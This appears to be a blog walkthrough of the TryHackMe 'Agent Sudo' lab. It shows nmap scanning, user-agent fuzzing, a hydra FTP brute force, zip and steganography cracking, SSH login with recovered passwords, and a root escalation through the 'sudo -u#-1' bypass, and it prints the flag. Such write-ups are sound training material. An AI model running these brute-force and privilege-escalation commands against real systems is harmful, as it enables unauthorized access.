Home img AgentSudo | Tryhackme | Walkthrough
Post
Cancel

img AgentSudo | Tryhackme | Walkthrough

maxresdefault-2146862418

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[/home/kali]
└─# nmap -sV -sC 10.10.69.110
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-14 01:02 EST
Nmap scan report for 10.10.69.110
Host is up (0.21s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
|   256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_  256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Annoucement
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.57 seconds

So there are totally 3 ports are open that is Ftp ssh http

HTTP - 80

Screenshot 2023-12-14 113235

there’s two hint on the port number 80 user-agent Agent R

Initial Foothold

  • Intercept the request
  • send it to intruder
  • add user-agent field in sniper mode
  • in payload section keep A to Z
  • start attack
  • look for changes in the response code

In the letter C you get this juicy information ! http://10.10.97.21/agent_C_attention.php

1
2
3
4
Attention chris,
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your g
od damn password, is weak!
From, Agent R

FTP

1️⃣ I tried FTP anonymous login but i failed 2️⃣ Bruteforcing hydra -l chris -P /usr/share/wordlist/rockyou.txt $IP ftp

ftp

there were 3 files in total we download it by mget *.*

  • To_agentJ.txt
  • cutie.png
  • cute-alien.jpg

1️⃣ To_agentJ.txt

1
2
3
4
5
6
Dear agent J,

All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.

From,
Agent C

2️⃣ cutie.png

  • binwalk -e cutie.png
  • unzip cutie.png

    #### Zip file password

  • ssh2john 8702.zip > 8702.hash
  • john 8702.hash --wordlist=/usr/share/seclists/Passwords/rockyou.txt

3️⃣ cute-alien.png

  • stegseek cute-alien.jpg /usr/share/seclists/passwords/rockyou.txt
1
2
3
4
5
6
7
8
9
cat cute-alien.jpg.out 
Hi james,

Glad you find this message. Your login password is hackerrules!

Don't ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,
chris

So we have james and hackerrules! as a password

SSH

ssh james@targetip

ssh

Privilege Escalation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
james@agent-sudo:~$ sudo -l
[sudo] password for james: 
Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash
james@agent-sudo:~$ sudo -u#-1 /bin/bash
root@agent-sudo:~# cat /root/root.txt 
To Mr.hacker,

Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine. 

Your flag is 
b53a02f55b57d4439e3341834d70c062

By,
DesKel a.k.a Agent R
root@agent-sudo:~# 

This post is licensed under CC BY 4.0 by the author.

front-page port 80-shoopyu Password Reset Vulnerabilities

img Anonymous | Tryhackme | Walkthrough